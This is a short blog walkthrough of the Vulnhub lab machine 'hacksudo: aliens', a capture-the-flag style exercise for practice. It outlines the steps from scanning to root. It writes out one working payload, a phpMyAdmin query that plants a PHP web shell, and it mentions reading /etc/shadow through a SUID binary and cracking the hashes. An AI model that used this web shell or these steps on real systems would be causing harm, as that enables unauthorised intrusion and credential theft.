Vulnhub hacksudo: aliens Walkthrough2021-04-11 11:18:43

https://www.vulnhub.com/entry/hacksudo-aliens,676/


Scan ports.

图片.png


Scan port 80.

图片.png


In /backup/mysql.bak, found credentials.

图片.png


Log in phpmyadmin at port  9000 using this credentials. Create a shell php.

SELECT "<?php system($_GET['c']); ?>" into outfile "/var/www/html/shell.php"



Get reverse shell.

图片.png


Check SUID files.

图片.png


Use date to read shadow.

图片.png


Crack hacksudo's passwd using john.

图片.png


Log inssh  as hacksudo, check SUID files again.

图片.png


Get root.

图片.png

作者:windy | 分类:Vulnhub | 浏览:1042 | 评论:0

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

«    2022年12月    »
1234
567891011
12131415161718
19202122232425
262728293031
网站分类
搜索
最新留言
文章归档
网站收藏
  • 订阅本站的 RSS 2.0 新闻聚合

Powered By Z-BlogPHP 1.7.2